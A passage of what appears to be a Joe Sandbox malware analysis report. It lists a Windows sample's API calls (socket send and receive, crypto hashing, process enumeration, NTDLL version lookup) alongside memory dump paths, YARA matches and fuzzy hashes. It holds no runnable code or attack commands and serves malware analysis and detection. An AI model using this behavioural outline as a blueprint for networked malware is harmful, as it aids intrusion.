                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 007DFA4D
                                                                            • wsprintfW.USER32 ref: 007DFA89
                                                                            • GetForegroundWindow.USER32(?), ref: 007DFAA2
                                                                            • SetWindowTextW.USER32(00000000), ref: 007DFAA9
                                                                            • WSAEventSelect.WS2_32(00000000,00000000,00000021), ref: 007DFAB9
                                                                            • WSAWaitForMultipleEvents.WS2_32(-00000001,00000000,00000000,000003E8,00000001), ref: 007DFADB
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DFB03
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DFB0D
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DFB3A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DFB44
                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 007DFB6A
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DFB89
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DFB93
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DFBF5
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DFBFF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$CloseFreeHandle$EventWindow$AllocCreateEventsForegroundInfoLocaleMultipleSelectTextWait___crtund_memcpywsprintf
                                                                            • String ID:
                                                                            • API String ID: 924265577-0
                                                                            • Opcode ID: b815702040aaf0ed207f8fabed40679a2a718c53036c2d5c8c44a6d99a6655f3
                                                                            • Instruction ID: b1b0dd6fb3e549f34105c74da9dbceb62b57263d21b7a7821ce506bb5aafbdea
                                                                            • Opcode Fuzzy Hash: b815702040aaf0ed207f8fabed40679a2a718c53036c2d5c8c44a6d99a6655f3
                                                                            • Instruction Fuzzy Hash: EF713FB5900209EFCB14DFA4D889BAEBB75FF48304F10C55AE916A7390C7399A42CF54
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000318), ref: 007E2540
                                                                            • LoadLibraryW.KERNEL32(NTDLL.DLL), ref: 007E2558
                                                                            • LocalFree.KERNEL32(00000000), ref: 007E256B
                                                                            • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 007E2581
                                                                            • LocalFree.KERNEL32(00000000), ref: 007E2594
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$AddressAllocLibraryLoadProc
                                                                            • String ID: NTDLL.DLL$RtlGetVersion
                                                                            • API String ID: 2539306102-196638859
                                                                            • Opcode ID: a976f09be1d790eb0fe9abfae26ad0f28870148e02fbbfe5250d183b791b8bfb
                                                                            • Instruction ID: b4f34a9be25a474b41e9d0d0448d81b7b0276c800cdf28cfdea00ff076622a7d
                                                                            • Opcode Fuzzy Hash: a976f09be1d790eb0fe9abfae26ad0f28870148e02fbbfe5250d183b791b8bfb
                                                                            • Instruction Fuzzy Hash: 8B51F374A01208EFCB14DF65D998BEDB7B8BB4C304F1085A8E50AA7251DB789F81DF50
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 007DF805
                                                                            • und_memcpy.LIBCMTD ref: 007DF82A
                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 007DF83A
                                                                            • WSAEventSelect.WS2_32(00000000,00000000,00000021), ref: 007DF869
                                                                            • WSAWaitForMultipleEvents.WS2_32(-00000001,00000000,00000000,00000000,00000000), ref: 007DF88A
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DF8A7
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DF8B1
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DF8D6
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DF8E0
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DF9C8
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DF9D2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$CloseFreeHandle$Event$AllocCreateEventsMultipleSelectWaitund_memcpy
                                                                            • String ID:
                                                                            • API String ID: 3749125693-0
                                                                            • Opcode ID: a8151d904d3db9640862a9111eedb7c46ed86e0a295e30878d14c6671d493a12
                                                                            • Instruction ID: 4e0b34cd3697dba3f2ad25db81b73180d3f301d2b704a48f9f7f58d8c0296ff3
                                                                            • Opcode Fuzzy Hash: a8151d904d3db9640862a9111eedb7c46ed86e0a295e30878d14c6671d493a12
                                                                            • Instruction Fuzzy Hash: 696121B5D00209EFCB04DF94D859BAEBBB5FF48304F10855AE906A7391C779AA41CF94
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 007DFC45
                                                                            • und_memcpy.LIBCMTD ref: 007DFC6A
                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 007DFC7A
                                                                            • WSAEventSelect.WS2_32(00000000,00000000,00000022), ref: 007DFCA9
                                                                            • WSAWaitForMultipleEvents.WS2_32(-00000001,00000000,00000000,00000000,00000000), ref: 007DFCCA
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DFCE7
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DFCF1
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DFD16
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DFD20
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DFDED
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DFDF7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$CloseFreeHandle$Event$AllocCreateEventsMultipleSelectWaitund_memcpy
                                                                            • String ID:
                                                                            • API String ID: 3749125693-0
                                                                            • Opcode ID: cedf05bf3ce872f7cb7a320388b6b157ec2a6265b59382459a930e97cef9aa2e
                                                                            • Instruction ID: 233b96e6173f8802ffe932c316e96043c446a98add68079cd5d6d1c576241ae7
                                                                            • Opcode Fuzzy Hash: cedf05bf3ce872f7cb7a320388b6b157ec2a6265b59382459a930e97cef9aa2e
                                                                            • Instruction Fuzzy Hash: B5614275A00209EFDB14DFA4D859BAEBBB6FF48304F108659E906A7391C7389A41CF94
APIs
• LocalAlloc.KERNEL32(00000040,00000000), ref: 007DFE45
• und_memcpy.LIBCMTD ref: 007DFE6A
• CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 007DFE7A
• WSAEventSelect.WS2_32(00000000,00000000,00000022), ref: 007DFEA9
• WSAWaitForMultipleEvents.WS2_32(-00000001,00000000,00000000,000003E8,00000000), ref: 007DFECB
• LocalFree.KERNEL32(00000000), ref: 007DFEF3
• CloseHandle.KERNEL32(00000000), ref: 007DFEFD
• LocalFree.KERNEL32(00000000), ref: 007DFF2A
• CloseHandle.KERNEL32(00000000), ref: 007DFF34
• ___crtGetLocaleInfoEx.LIBCMTD ref: 007DFF56
• WSAGetLastError.WS2_32 ref: 007DFF88
• LocalFree.KERNEL32(00000000), ref: 007DFFA8
• CloseHandle.KERNEL32(00000000), ref: 007DFFB2
• CloseHandle.KERNEL32(00000000), ref: 007DFFCA
• LocalFree.KERNEL32(00000000), ref: 007DFFD4
Memory Dump Source
• Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_file.jbxd
Yara matches
Similarity
• API ID: Local$CloseFreeHandle$Event$AllocCreateErrorEventsInfoLastLocaleMultipleSelectWait___crtund_memcpy
• String ID:
• API String ID: 1311366638-0
• Opcode ID: 0aaa00eeffd46e28f160525a67c542dc72ad3aa3637e58dd687625115da8b633
• Instruction ID: d0854331b6517e1ec48b5b0c01645ae8acca1653a84c52f424679b3c2cdcbda1
• Opcode Fuzzy Hash: 0aaa00eeffd46e28f160525a67c542dc72ad3aa3637e58dd687625115da8b633
• Instruction Fuzzy Hash: 4D515EB5900209EFCB14DFA4D889BAEBBB5BB48304F10855AF916A7391C7389A41CF94
APIs
• CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000,?,?,?,007C9E2A,00000000), ref: 007DBF2D
• CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000,?,?,?,007C9E2A,00000000), ref: 007DBF4D
• WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007DBFA4
• CryptHashData.ADVAPI32(00000000,007C9E2A,00002710,00000000), ref: 007DBFCA
• CryptHashData.ADVAPI32(00000000,007C9E2A,00000000,00000000), ref: 007DC000
• CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,007C9E2A,00000000), ref: 007DC04A
• CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,007C9E2A,00000000), ref: 007DC06A
• CryptDestroyHash.ADVAPI32(00000000,?,?,?,007C9E2A,00000000), ref: 007DC07A
Strings
• Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 007DBF22
Memory Dump Source
• Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_file.jbxd
Yara matches
Similarity
• API ID: Crypt$Hash$Context$DataRelease$AcquireCreateDestroyObjectSingleWait
• String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
• API String ID: 1452691613-63410773
• Opcode ID: 87d732db9019961db8accf69761943ad5c46a2bdfca3078654f50dd655847dfb
• Instruction ID: d372340a136e7a28fe1b2e2d26fcaa71bc181ac48967d5e82c8288d20dba4d09
• Opcode Fuzzy Hash: 87d732db9019961db8accf69761943ad5c46a2bdfca3078654f50dd655847dfb
• Instruction Fuzzy Hash: 9F414D74A00209EBDB14CF94DD99BEEB7B5FF48704F208449F605A7290C7B99A40DB90
APIs
• ___crtGetLocaleInfoEx.LIBCMTD ref: 007E096D
  • Part of subcall function 007DF650: recv.WS2_32(00000000,?,000000FF,007E0A9A), ref: 007DF663
Memory Dump Source
• Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_file.jbxd
Yara matches
Similarity
• API ID: InfoLocale___crtrecv
• String ID:
• API String ID: 818993241-0
• Opcode ID: d2a08ac338abd3f0dd9abef821f7c33c07f0fc1e7b2754be562a5c745f4b9a37
• Instruction ID: f9813c59b24216c48559a3e9a911ff6449eb71b812f7300cf6c1d854c6d0f5d0
• Opcode Fuzzy Hash: d2a08ac338abd3f0dd9abef821f7c33c07f0fc1e7b2754be562a5c745f4b9a37
• Instruction Fuzzy Hash: CDB10874901248DFDB14CF99C984BEDBBB1FF48308F248219E805AB295D7B9A9C1DF91
APIs
• ___crtGetLocaleInfoEx.LIBCMTD ref: 007E0CED
  • Part of subcall function 007DF670: send.WS2_32(00000000,?,000000FF,007E0E0C), ref: 007DF683
Memory Dump Source
• Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_file.jbxd
Yara matches
Similarity
• API ID: InfoLocale___crtsend
• String ID:
• API String ID: 3464212537-0
• Opcode ID: e341f24f7a97d19955d163932bbbcbb23833510ab5fc2e67b940cb18ed7137a8
• Instruction ID: 15cc37b3eda363bcadbba0915083cb87eaa089d08f160be007ab974ae72709bb
• Opcode Fuzzy Hash: e341f24f7a97d19955d163932bbbcbb23833510ab5fc2e67b940cb18ed7137a8
• Instruction Fuzzy Hash: 26B12E74A01288DFDB24CF85D985BADB7B1FF48308F208549E805AB385C7B9A9D1CF81
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007C4424
• Process32FirstW.KERNEL32(000000FF,0000022C), ref: 007C444C
• StrCmpIW.SHLWAPI(?,-00834CE4), ref: 007C4496
• CloseHandle.KERNEL32(000000FF), ref: 007C44A4
• Process32NextW.KERNEL32(000000FF,0000022C), ref: 007C44BE
• CloseHandle.KERNEL32(000000FF), ref: 007C44CC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_file.jbxd
Yara matches
Similarity
• API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
• String ID: A#v
• API String ID: 1789362936-4158731453
• Opcode ID: 1471ee849dff24a4befe8b526fffc0861fdadfa22c3fb6ec5f894aa6a78cc1cf
• Instruction ID: 0efcc1be4767eba86c2baa8bce08570c5d06e82a98ecd6a08942da45e0a1b4d5
• Opcode Fuzzy Hash: 1471ee849dff24a4befe8b526fffc0861fdadfa22c3fb6ec5f894aa6a78cc1cf
• Instruction Fuzzy Hash: 30111C71901218EBDB28DFA4DD5CBA9B7B8BB44300F204A9CE519A7290D7389B41DF50
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007C44F4
• Process32FirstW.KERNEL32(000000FF,0000022C), ref: 007C451C
• StrCmpIW.SHLWAPI(?,-008358D8), ref: 007C4566
• CloseHandle.KERNEL32(000000FF), ref: 007C4574
• Process32NextW.KERNEL32(000000FF,0000022C), ref: 007C458E
• CloseHandle.KERNEL32(000000FF), ref: 007C459C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_file.jbxd
Yara matches
Similarity
• API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
• String ID: A#v
• API String ID: 1789362936-4158731453
• Opcode ID: b87dc0bd44d78dc6b5bf7a130450a23c87710d4e06a2ce813f4158950648d50a
• Instruction ID: 2036bda5c54e94a21485cf57eb05698f2115662a3e74f83dc908508dd4ae9dc9
• Opcode Fuzzy Hash: b87dc0bd44d78dc6b5bf7a130450a23c87710d4e06a2ce813f4158950648d50a
• Instruction Fuzzy Hash: AB111C71901218DBDB24DFA4ED5CBA9B7B8BB54301F204AACA506A7290D738DB51DF50
APIs
• GetCurrentProcessId.KERNEL32 ref: 007DCA09
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007DCA16
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 007DCA3A
• CloseHandle.KERNEL32(00000000), ref: 007DCA53
• Process32NextW.KERNEL32(00000000,0000022C), ref: 007DCA6C
• CloseHandle.KERNEL32(00000000), ref: 007DCA7A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_file.jbxd
Yara matches
Similarity
• API ID: CloseHandleProcess32$CreateCurrentFirstNextProcessSnapshotToolhelp32
• String ID: A#v
• API String ID: 3177329567-4158731453
• Opcode ID: 074e0a2615d9368c49a5a1fd468795edf90acc32b08b73a6576fc7740ca2325c
• Instruction ID: 43668468ddab01a67f0a677cbd487ac3fe0030684af5b825119b59dd873c31b1
• Opcode Fuzzy Hash: 074e0a2615d9368c49a5a1fd468795edf90acc32b08b73a6576fc7740ca2325c
• Instruction Fuzzy Hash: A801CC75A01219EBDB11EFA4DD8CB9DBBB8BF88701F104595F505A6290D7389F40DB50
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,000003F0,?,?,?,?,?,?,?,?,007E04A6,?), ref: 007E0672
                                                                            • htons.WS2_32(?), ref: 007E0697
                                                                            • wsprintfA.USER32 ref: 007E06C0
                                                                              • Part of subcall function 007E0870: WSACreateEvent.WS2_32 ref: 007E0876
                                                                              • Part of subcall function 007E0870: WSAEventSelect.WS2_32(?,00000000,00000002), ref: 007E0893
                                                                              • Part of subcall function 007E0870: WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 007E08D3
                                                                              • Part of subcall function 007E0870: WSACloseEvent.WS2_32(00000000), ref: 007E08E0
                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 007E0701
                                                                              • Part of subcall function 007DF670: send.WS2_32(00000000,?,000000FF,007E0E0C), ref: 007DF683
                                                                              • Part of subcall function 007E0790: WSACreateEvent.WS2_32 ref: 007E0796
                                                                              • Part of subcall function 007E0790: WSAEventSelect.WS2_32(?,00000000,00000001), ref: 007E07B3
                                                                              • Part of subcall function 007E0790: WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 007E07F3
                                                                              • Part of subcall function 007E0790: WSACloseEvent.WS2_32(00000000), ref: 007E0800
                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 007E073A
                                                                              • Part of subcall function 007DF650: recv.WS2_32(00000000,?,000000FF,007E0A9A), ref: 007DF663
                                                                            • und_memcpy.LIBCMTD ref: 007E076A
                                                                            • LocalFree.KERNEL32(00000000), ref: 007E0776
                                                                            • LocalFree.KERNEL32(00000000), ref: 007E0784
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$Local$CloseCreateEventsFreeInfoLocaleMultipleSelectWait___crt$Allochtonsrecvsendund_memcpywsprintf
                                                                            • String ID:
                                                                            • API String ID: 2352516679-0
                                                                            • Opcode ID: 80123577eceb3c3e213876514939b057926296c09f4f591a5f2de1be49c51a38
                                                                            • Instruction ID: 62a8086c298c6410e3e7a67c5b180b3a07516696d732543cd6fb4a904a7b1f41
                                                                            • Opcode Fuzzy Hash: 80123577eceb3c3e213876514939b057926296c09f4f591a5f2de1be49c51a38
                                                                            • Instruction Fuzzy Hash: 5A412DB5E00219AFCB04DF94D885ABEBBB5BF4C300F148549EA45AB341D639E981CFE4
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,000003F0,?,?,?,?,?,?,?,007E043F,?), ref: 007E0532
                                                                            • htons.WS2_32(?), ref: 007E0557
                                                                              • Part of subcall function 007E0870: WSACreateEvent.WS2_32 ref: 007E0876
                                                                              • Part of subcall function 007E0870: WSAEventSelect.WS2_32(?,00000000,00000002), ref: 007E0893
                                                                              • Part of subcall function 007E0870: WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 007E08D3
                                                                              • Part of subcall function 007E0870: WSACloseEvent.WS2_32(00000000), ref: 007E08E0
                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 007E059D
                                                                              • Part of subcall function 007DF670: send.WS2_32(00000000,?,000000FF,007E0E0C), ref: 007DF683
                                                                              • Part of subcall function 007E0790: WSACreateEvent.WS2_32 ref: 007E0796
                                                                              • Part of subcall function 007E0790: WSAEventSelect.WS2_32(?,00000000,00000001), ref: 007E07B3
                                                                              • Part of subcall function 007E0790: WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 007E07F3
